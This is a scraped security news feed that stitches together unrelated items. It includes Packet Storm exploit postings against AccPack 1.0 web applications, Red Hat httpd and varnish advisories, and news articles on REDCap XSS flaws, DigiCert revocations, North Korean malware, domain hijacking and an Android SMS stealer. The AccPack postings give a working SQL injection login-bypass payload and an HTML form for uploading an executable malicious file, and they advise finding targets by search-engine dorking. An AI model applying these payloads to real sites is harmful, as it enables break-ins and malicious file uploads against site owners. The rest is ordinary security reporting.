AccPack Khanepani version 1.0 suffers from an insecure direct object reference vulnerability.

**AccPack Khanepani 1.0 Insecure Direct Object Reference**

Posted Jul 31, 2024

Authored by indoushka

AccPack Khanepani version 1.0 suffers from an insecure direct object reference vulnerability.

tags | exploit

SHA-256 | 760d2e5184238b42e8f1ba299d632f9a683af578d5af3fd433dd135eb0ceb06b

Download | Favorite | View

**AccPack Khanepani 1.0 Insecure Direct Object Reference**

    =============================================================================================================================================| # Title     : AccPack Khanepani v1.0 IDOR Vulnerability                                                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Direct Object Reference : leads to the creation of a new file in the list.[+] use payload : cms/gallery/insert.php[+] http://127.0.0.1/jamiatulamanepalorgnp/cms/gallery/insert.phpGreetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,223)
*   Arbitrary (16,842)
*   BBS (2,859)
*   Bypass (1,855)
*   CGI (1,033)
*   Code Execution (7,784)
*   Conference (691)
*   Cracker (844)
*   CSRF (3,384)
*   DoS (25,024)
*   Encryption (2,389)
*   Exploit (53,098)
*   File Inclusion (4,257)
*   File Upload (990)
*   Firewall (822)
*   Info Disclosure (2,885)
*   Intrusion Detection (914)
*   Java (3,141)
*   JavaScript (896)
*   Kernel (7,184)
*   Local (14,788)
*   Magazine (586)
*   Overflow (13,165)
*   Perl (1,435)
*   PHP (5,221)
*   Proof of Concept (2,381)
*   Protocol (3,724)
*   Python (1,631)
*   Remote (31,625)
*   Root (3,633)
*   Rootkit (526)
*   Ruby (631)
*   Scanner (1,657)
*   Security Tool (8,024)
*   Shell (3,273)
*   Shellcode (1,217)
*   Sniffer (902)
*   Spoof (2,275)
*   SQL Injection (16,594)
*   TCP (2,440)
*   Trojan (690)
*   UDP (904)
*   Virus (669)
*   Vulnerability (32,921)
*   Web (9,953)
*   Whitepaper (3,781)
*   x86 (967)
*   XSS (18,239)
*   Other

**File Archives**

*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   September 2023
*   August 2023
*   Older

**Systems**

*   AIX (429)
*   Apple (2,099)
*   BSD (377)
*   CentOS (58)
*   Cisco (1,927)
*   Debian (7,084)
*   Fedora (1,693)
*   FreeBSD (1,246)
*   Gentoo (4,534)
*   HPUX (880)
*   iOS (378)
*   iPhone (108)
*   IRIX (220)
*   Juniper (69)
*   Linux (50,580)
*   Mac OS X (691)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,432)
*   Slackware (941)
*   Solaris (1,611)
*   SUSE (1,444)
*   Ubuntu (9,710)
*   UNIX (9,432)
*   UnixWare (187)
*   Windows (6,668)
*   Other

AccPack Khanepani 1.0 Insecure Direct Object Reference

Red Hat Security Advisory 2024-4938-03 - An update for httpd is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support. Issues addressed include a null pointer vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4938.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: httpd security updateAdvisory ID:        RHSA-2024:4938-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4938Issue date:         2024-07-31Revision:           03CVE Names:          CVE-2024-38474====================================================================Summary: An update for httpd is now available for Red Hat Enterprise Linux 7.7 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:The httpd packages provide the Apache HTTP Server, a powerful, efficient, and extensible web server.Security Fix(es):* httpd: Substitution encoding issue in mod_rewrite (CVE-2024-38474)* httpd: Improper escaping of output in mod_rewrite (CVE-2024-38475)* httpd: NULL pointer dereference in mod_proxy (CVE-2024-38477)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-38474References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2295013https://bugzilla.redhat.com/show_bug.cgi?id=2295014https://bugzilla.redhat.com/show_bug.cgi?id=2295016

Red Hat Security Advisory 2024-4938-03

The security vulnerabilities, CVE-2024-37394, CVE-2024-37395, and CVE-2024-37396, could lay open proprietary and sensitive research to data thieves.

Source: Yuri Arcurs via Alamy Stock Photo

Researchers have discovered three cross-site scripting (XSS) vulnerabilities in Research Electronic Data Capture (REDCap), a Web application developed by Vanderbilt University and used for building and managing online surveys and databases for scientific and academic researchers.

The vulnerabilities are tracked as CVE-2024-37394, CVE-2024-37395, and CVE-2024-37396, and they "could allow attackers to execute malicious JavaScript code in victims' browsers, potentially compromising sensitive data," according to an advisory from Trustwave's SpiderLabs.

Researchers there identified the vulnerabilities in multiple locations within version 13.1.9 in REDCap, which is popular in universities and scientific institutions for managing studies that contain private, sensitive information. The vulnerable locations in the platform include calendar events, public surveys, and project dashboards.

"Our researchers developed proof-of-concept exploits for each vulnerable location," the researchers wrote. "In each case, they were able to inject a simple JavaScript payload that, when triggered, executes an alert displaying the document domain."

The vulnerabilities could allow threat actors to steal sensitive information, impersonate the victim's actions, manipulate the REDCap application, and even gain access to protected data.

It's recommended that users update to REDCap version 14.2.1 or later, where Vanderbilt University has addressed these bugs, to mitigate these flaws. 

**About the Author(s)**

Dangerous XSS Bugs in RedCAP Threaten Academic &amp; Scientific Research

Red Hat Security Advisory 2024-4937-03 - An update for the varnish:6 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support. Issues addressed include a denial of service vulnerability.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_4937.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Important: varnish:6 security updateAdvisory ID:        RHSA-2024:4937-03Product:            Red Hat Enterprise LinuxAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:4937Issue date:         2024-07-31Revision:           03CVE Names:          CVE-2024-30156====================================================================Summary: An update for the varnish:6 module is now available for Red Hat Enterprise Linux 8.2 Advanced Update Support.Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Varnish Cache is a high-performance HTTP accelerator. It stores web pages in memory so web servers don't have to create the same web page over and over again, giving the website a significant speed up.Security Fix(es):* varnish: HTTP/2 Broken Window Attack may result in denial of service (CVE-2024-30156)For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.Solution:https://access.redhat.com/articles/11258CVEs:CVE-2024-30156References:https://access.redhat.com/security/updates/classification/#importanthttps://bugzilla.redhat.com/show_bug.cgi?id=2271486

Red Hat Security Advisory 2024-4937-03

AccPack Cop version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : AccPack Cop v1.0 Auth By Pass Vulnerability                                                                                 || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AccPack Cop 1.0 SQL Injection

Certificate authority (CA) DigiCert has warned that it will be revoking a subset of SSL/TLS certificates within 24 hours due to an oversight with how it verified if a digital certificate is issued to the rightful owner of a domain.
The company said it will be taking the step of revoking certificates that do not have proper Domain Control Validation (DCV).
"Before issuing a certificate to a

Web Security / Compliance

Certificate authority (CA) DigiCert has warned that it will be revoking a subset of SSL/TLS certificates within 24 hours due to an oversight with how it verified if a digital certificate is issued to the rightful owner of a domain.

The company said it will be taking the step of revoking certificates that do not have proper Domain Control Validation (DCV).

"Before issuing a certificate to a customer, DigiCert validates the customer's control or ownership over the domain name for which they are requesting a certificate using one of several methods approved by the CA/Browser Forum (CABF)," it said.

One of the ways this is done hinges on the customer setting up a DNS CNAME record containing a random value provided to them by DigiCert, which then performs a DNS lookup for the domain in question to make sure that the random values are the same.

The random value, per DigiCert, is prefixed with an underscore character so as to prevent a possible collision with an actual subdomain that uses the same random value.

What the Utah-based company found was that it had failed to include the underscore prefix with the random value used in some CNAME-based validation cases.

The issue has its roots in a series of changes that were enacted starting in 2019 to revamp the underlying architecture, as part of which the code adding an underscore prefix was removed and subsequently "added to some paths in the updated system" but not to one path that neither added it automatically nor checked if the random value had a pre-appended underscore.

"The omission of an automatic underscore prefix was not caught during the cross-functional team reviews that occurred before deployment of the updated system," DigiCert said.

"While we had regression testing in place, those tests failed to alert us to the change in functionality because the regression tests were scoped to workflows and functionality instead of the content/structure of the random value."

"Unfortunately, no reviews were done to compare the legacy random value implementations with the random value implementations in the new system for every scenario. Had we conducted those evaluations, we would have learned earlier that the system was not automatically adding the underscore prefix to the random value where needed."

Subsequently, on June 11, 2024, DigiCert said it revamped the random value generation process and eliminated the manual addition of the underscore prefix within the confines of a user-experience enhancement project, but acknowledged it again failed to "compare this UX change against the underscore flow in the legacy system."

The company said it didn't discover the non-compliance issue until "several weeks ago" when an unnamed customer reached out regarding the random values used in validation, prompting a deeper review.

It also noted that the incident impacts approximately 0.4% of the applicable domain validations, which, according to an update on the related Bugzilla report, affects 83,267 certificates and 6,807 customers.

Notified customers are recommended to replace their certificates as soon as possible by signing into their DigiCert accounts, generating a Certificate Signing Request (CSR), and reissuing them after passing DCV.

The development has prompted the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to publish an alert, stating that "revocation of these certificates may cause temporary disruptions to websites, services, and applications relying on these certificates for secure communication."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

DigiCert to Revoke 83,000+ SSL Certificates Due to Domain Validation Oversight

AccPack Buzz version 1.0 suffers from an arbitrary file upload vulnerability.

    =============================================================================================================================================| # Title     : AccPack Buzz v1.0 Remote File Upload Vulnerability                                                                          || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] The following html code uploads a executable malicious file remotely .[+] use payload : <html><head>  <title>Add</title></head><body>  <div align="center"><form action="http://127.0.0.1/jamiatulamanepalorgp/cms/gallery/insert.php" method="POST"  enctype="multipart/form-data"><table>  <tr>    <td>Image</td><td>      <input type="file" name="image-upload" id="image-upload"></td>   </tr>   <tr>    <td>Status</td><td>      <input type="radio" name="status" id="actiive" value="1" checked /> <label for="active">Active</label>      <input type="radio" name="status" id="passive" value="0" /><label for="passive">Passive</label>    </td>   </tr>      <tr style='height:80'>    <td colspan="2"><input type='submit' value='Submit'><input type='reset' Value='Reset'></td>   </tr></table></form></div></body></html>[+] In the seventh line, we change the link to the target link.[+] Link to the uploaded files : cms/image/gallery/[+] The script renames the file to a number, and you always choose numbers starting from the number 9 and above.Greetings to :============================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |==========================================================================

AccPack Buzz 1.0 Arbitrary File Upload

The threat actors behind an ongoing malware campaign targeting software developers have demonstrated new malware and tactics, expanding their focus to include Windows, Linux, and macOS systems.
The activity cluster, dubbed DEV#POPPER and linked to North Korea, has been found to have singled out victims across South Korea, North America, Europe, and the Middle East.
"This form of attack is an

Malware / Software Development

The threat actors behind an ongoing malware campaign targeting software developers have demonstrated new malware and tactics, expanding their focus to include Windows, Linux, and macOS systems.

The activity cluster, dubbed **DEV#POPPER** and linked to North Korea, has been found to have singled out victims across South Korea, North America, Europe, and the Middle East.

"This form of attack is an advanced form of social engineering, designed to manipulate individuals into divulging confidential information or performing actions that they might normally not," Securonix researchers Den Iuzvyk and Tim Peck said in a new report shared with The Hacker News.

DEV#POPPER is the moniker assigned to an active malware campaign that tricks software developers into downloading booby-trapped software hosted on GitHub under the guise of a job interview. It shares overlaps with a campaign tracked by Palo Alto Networks Unit 42 under the name Contagious Interview.

Signs that the campaign was broader and cross-platform in scope emerged earlier this month when researchers uncovered artifacts targeting both Windows and macOS that delivered an updated version of a malware called BeaverTail.

The attack chain document by Securonix is more or less consistent in that the threat actors pose as interviewers for a developer position and urge the candidates to download a ZIP archive file for a coding assignment.

Present with the archive is an npm module that, once installed, triggers the execution of an obfuscated JavaScript (i.e., BeaverTail) that determines the operating system on which it's running and establishes contact with a remote server to exfiltrate data of interest.

It's also capable of downloading next-stage payloads, including a Python backdoor referred to as InvisibleFerret, which is designed to gather detailed system metadata, access cookies stored in web browsers, execute commands, upload/download files, as well as log keystrokes and clipboard content.

New features added to the recent samples include the use of enhanced obfuscation, AnyDesk remote monitoring and management (RMM) software for persistence, and improvements to the FTP mechanism employed for data exfiltration.

Furthermore, the Python script acts as a conduit to run an ancillary script that's responsible for stealing sensitive information from various web browsers – Google Chrome, Opera, and Brave – across different operating systems.

"This sophisticated extension to the original DEV#POPPER campaign continues to leverage Python scripts to execute a multi-stage attack focused on exfiltrating sensitive information from victims, though now with much more robust capabilities," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

North Korea-Linked Malware Targets Developers on Windows, Linux, and macOS

More than a million domain names -- including many registered by Fortune 100 firms and brand protection companies -- are vulnerable to takeover by cybercriminals thanks to authentication weaknesses at a number of large web hosting providers and domain registrars, new research finds.

More than a million domain names — including many registered by Fortune 100 firms and brand protection companies — are vulnerable to takeover by cybercriminals thanks to authentication weaknesses at a number of large web hosting providers and domain registrars, new research finds.

Image: Shutterstock.

Your Web browser knows how to find a site like example.com thanks to the global Domain Name System (DNS), which serves as a kind of phone book for the Internet by translating human-friendly website names (example.com) into numeric Internet addresses.

When someone registers a domain name, the registrar will typically provide two sets of DNS records that the customer then needs to assign to their domain. Those records are crucial because they allow Web browsers to find the Internet address of the hosting provider that is serving that domain.

But potential problems can arise when a domain’s DNS records are “lame,” meaning the authoritative name server does not have enough information about the domain and can’t resolve queries to find it. A domain can become lame in a variety of ways, such as when it is not assigned an Internet address, or because the name servers in the domain’s authoritative record are misconfigured or missing.

The reason lame domains are problematic is that a number of Web hosting and DNS providers allow users to claim control over a domain _without accessing the true owner’s account at their DNS provider or registrar_.

If this threat sounds familiar, that’s because it is hardly new. Back in 2019, KrebsOnSecurity wrote about thieves employing this method to seize control over thousands of domains registered at GoDaddy, and using those to send bomb threats and sextortion emails (GoDaddy says they fixed that weakness in their systems not long after that 2019 story).

In the 2019 campaign, the spammers created accounts on GoDaddy and were able to take over vulnerable domains simply by registering a free account at GoDaddy and being assigned the same DNS servers as the hijacked domain.

Three years before that, the same pervasive weakness was described in a blog post by security researcher **Matthew Bryant**, who showed how one could commandeer at least 120,000 domains via DNS weaknesses at some of the world’s largest hosting providers.

Incredibly, new research jointly released today by security experts at **Infoblox** and **Eclypsium** finds this same authentication weakness is still present at a number of large hosting and DNS providers.

“It’s easy to exploit, very hard to detect, and it’s entirely preventable,” said **Dave Mitchell**, principal threat researcher at Infoblox. “Free services make it easier \[to exploit\] at scale. And the bulk of these are at a handful of DNS providers.”

**SITTING DUCKS**

Infoblox’s report found there are multiple cybercriminal groups abusing these stolen domains as a globally dispersed “traffic distribution system,” which can be used to mask the true source or destination of web traffic and to funnel Web users to malicious or phishous websites.

Commandeering domains this way also can allow thieves to impersonate trusted brands and abuse their positive or at least neutral reputation when sending email from those domains, as we saw in 2019 with the GoDaddy attacks.

“Hijacked domains have been used directly in phishing attacks and scams, as well as large spam systems,” reads the Infoblox report, which refers to lame domains as “**Sitting Ducks**.” “There is evidence that some domains were used for Cobalt Strike and other malware command and control (C2). Other attacks have used hijacked domains in targeted phishing attacks by creating lookalike subdomains. A few actors have stockpiled hijacked domains for an unknown purpose.”

Eclypsium researchers estimate there are currently about one million Sitting Duck domains, and that at least 30,000 of them have been hijacked for malicious use since 2019.

“As of the time of writing, numerous DNS providers enable this through weak or nonexistent verification of domain ownership for a given account,” Eclypsium wrote.

The security firms said they found a number of compromised Sitting Duck domains were originally registered by brand protection companies that specialize in defensive domain registrations (reserving look-alike domains for top brands before those names can be grabbed by scammers) and combating trademark infringement.

For example, Infoblox found cybercriminal groups using a Sitting Duck domain called **clickermediacorp\[.\]com**, which was a CBS Interactive Inc. domain initially registered in 2009 at GoDaddy. However, in 2010 the DNS was updated to DNSMadeEasy.com servers, and in 2012 the domain was transferred to **MarkMonitor**.

Another hijacked Sitting Duck domain — **anti-phishing\[.\]org** — was registered in 2003 by the **Anti-Phishing Working Group** (APWG), a cybersecurity not-for-profit organization that closely tracks phishing attacks.

In many cases, the researchers discovered Sitting Duck domains that appear to have been configured to auto-renew at the registrar, but the authoritative DNS or hosting services were not renewed.

The researchers say Sitting Duck domains all possess three attributes that makes them vulnerable to takeover:

1) the domain uses or delegates authoritative DNS services to a different provider than the domain registrar;  
2) the authoritative name server(s) for the domain does not have information about the Internet address the domain should point to;  
3) the authoritative DNS provider is “exploitable,” i.e. an attacker can claim the domain at the provider and set up DNS records without access to the valid domain owner’s account at the domain registrar.

Image: Infoblox.

How does one know whether a DNS provider is exploitable? There is a frequently updated list published on **GitHub** called “Can I take over DNS,” which has been documenting exploitability by DNS provider over the past several years. The list includes examples for each of the named DNS providers.

In the case of the aforementioned Sitting Duck domain clickermediacorp\[.\]com, the domain appears to have been hijacked by scammers by claiming it at the web hosting firm **DNSMadeEasy**, which is owned by **Digicert**, one of the industry’s largest issuers of digital certificates (SSL/TLS certificates).

In an interview with KrebsOnSecurity, DNSMadeEasy founder and senior vice president **Steve Job** said the problem isn’t really his company’s to solve, noting that DNS providers who are also not domain registrars have no real way of validating whether a given customer legitimately owns the domain being claimed.

“We do shut down abusive accounts when we find them,” Job said. “But it’s my belief that the onus needs to be on the \[domain registrants\] themselves. If you’re going to buy something and point it somewhere you have no control over, we can’t prevent that.”

Infoblox, Eclypsium, and the DNS wiki listing at Github all say that web hosting giant **Digital Ocean** is among the vulnerable hosting firms. In response to questions, Digital Ocean said it was exploring options for mitigating such activity.

“The DigitalOcean DNS service is not authoritative, and we are not a domain registrar,” Digital Ocean wrote in an emailed response. “Where a domain owner has delegated authority to our DNS infrastructure with their registrar, and they have allowed their ownership of that DNS record in our infrastructure to lapse, that becomes a ‘lame delegation’ under this hijack model. We believe the root cause, ultimately, is poor management of domain name configuration by the owner, akin to leaving your keys in your unlocked car, but we acknowledge the opportunity to adjust our non-authoritative DNS service guardrails in an effort to help minimize the impact of a lapse in hygiene at the authoritative DNS level. We’re connected with the research teams to explore additional mitigation options.”

In a statement provided to KrebsOnSecurity, the hosting provider and registrar **Hostinger** said they were working to implement a solution to prevent lame duck attacks in the “upcoming weeks.”

“We are working on implementing an SOA-based domain verification system,” Hostinger wrote. “Custom nameservers with a Start of Authority (SOA) record will be used to verify whether the domain truly belongs to the customer. We aim to launch this user-friendly solution by the end of August. The final step is to deprecate preview domains, a functionality sometimes used by customers with malicious intents. Preview domains will be deprecated by the end of September. Legitimate users will be able to use randomly generated temporary subdomains instead.”

What did DNS providers that have struggled with this issue in the past do to address these authentication challenges? The security firms said that to claim a domain name, the best practice providers gave the account holder random name servers that required a change at the registrar before the domains could go live. They also found the best practice providers used various mechanisms to ensure that the newly assigned name server hosts did not match previous name server assignments.

\[Side note: Infoblox observed that many of the hijacked domains were being hosted at **Stark Industries Solutions**, a sprawling hosting provider that appeared two weeks before Russia invaded Ukraine and has become the epicenter of countless cyberattacks against enemies of Russia\].

Both Infoblox and Eclypsium said that without more cooperation and less finger-pointing by all stakeholders in the global DNS, attacks on sitting duck domains will continue to rise, with domain registrants and regular Internet users caught in the middle.

“Government organizations, regulators, and standards bodies should consider long-term solutions to vulnerabilities in the DNS management attack surface,” the Infoblox report concludes.

Don’t Let Your Domain Name Become a “Sitting Duck”

A new malicious campaign has been observed making use of malicious Android apps to steal users' SMS messages since at least February 2022 as part of a large-scale campaign.
The malicious apps, spanning over 107,000 unique samples, are designed to intercept one-time passwords (OTPs) used for online account verification to commit identity fraud.
"Of those 107,000 malware samples, over 99,000 of

A new malicious campaign has been observed making use of malicious Android apps to steal users' SMS messages since at least February 2022 as part of a large-scale campaign.

The malicious apps, spanning over 107,000 unique samples, are designed to intercept one-time passwords (OTPs) used for online account verification to commit identity fraud.

"Of those 107,000 malware samples, over 99,000 of these applications are/were unknown and unavailable in generally available repositories," mobile security firm Zimperium said in a report shared with The Hacker News. "This malware was monitoring one-time password messages across over 600 global brands, with some brands having user counts in the hundreds of millions of users."

Victims of the campaign have been detected in 113 countries, with India and Russia topping the list, followed by Brazil, Mexico, the U.S., Ukraine, Spain, and Turkey.

The starting point of the attack is the installation of a malicious app that a victim is tricked into installing on their device either through deceptive ads mimicking Google Play Store app listings or any of the 2,600 Telegram bots that serve as the distribution channel by masquerading as legitimate services (e.g., Microsoft Word).

Once installed, the app requests permission to access incoming SMS messages, following which it reaches out to one of the 13 command-and-control (C2) servers to transmit stolen SMS messages.

"The malware remains hidden, constantly monitoring new incoming SMS messages," the researchers said. "Its primary target is OTPs used for online account verification."

It's currently not clear who is behind the operation, although the threat actors have been observed accepting various payment methods, including cryptocurrency, to fuel a service called Fast SMS (fastsms\[.\]su) that allows customers to purchase access to virtual phone numbers.

It's likely that the phone numbers associated with the infected devices are being used without the owner's knowledge to register for various online accounts by harvesting the OTPs required for two-factor authentication (2FA).

In early 2022, Trend Micro shed light on a similar financially-motivated service that corralled Android devices into a botnet that could be used to "register disposable accounts in bulk or create phone-verified accounts for conducting fraud and other criminal activities."

"These stolen credentials serve as a springboard for further fraudulent activities, such as creating fake accounts on popular services to launch phishing campaigns or social engineering attacks," Zimperium said.

The findings highlight the continued abuse of Telegram, a popular instant messaging app with over 950 million monthly active users, by malicious actors for different purposes ranging from malware propagation to C2.

Earlier this month, Positive Technologies disclosed two SMS stealer families dubbed SMS Webpro and NotifySmsStealer that target Android device users in Bangladesh, India, and Indonesia with an aim to siphon messages to a Telegram bot maintained by the threat actors.

Also identified by the Russian cybersecurity company are stealer malware strains that masquerade as TrueCaller and ICICI Bank, and are capable of exfiltrating users' photos, device information, and notifications via the messaging platform.

"The chain of infection starts with a typical phishing attack on WhatsApp," security researcher Varvara Akhapkina said. "With few exceptions, the attacker uses phishing sites posing as a bank to get users to download apps from them."

Another malware that leverages Telegram as a C2 server is TgRAT, a Windows remote access trojan that has recently been updated to include a Linux variant. It's equipped to download files, take screenshots, and run commands remotely.

"Telegram is widely used as a corporate messenger in many companies," Doctor Web said. "Therefore, it is not surprising that threat actors can use it as a vector to deliver malware and steal confidential information: the popularity of the program and the routine traffic to Telegram's servers make it easy to disguise malware on a compromised network."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Tag

#web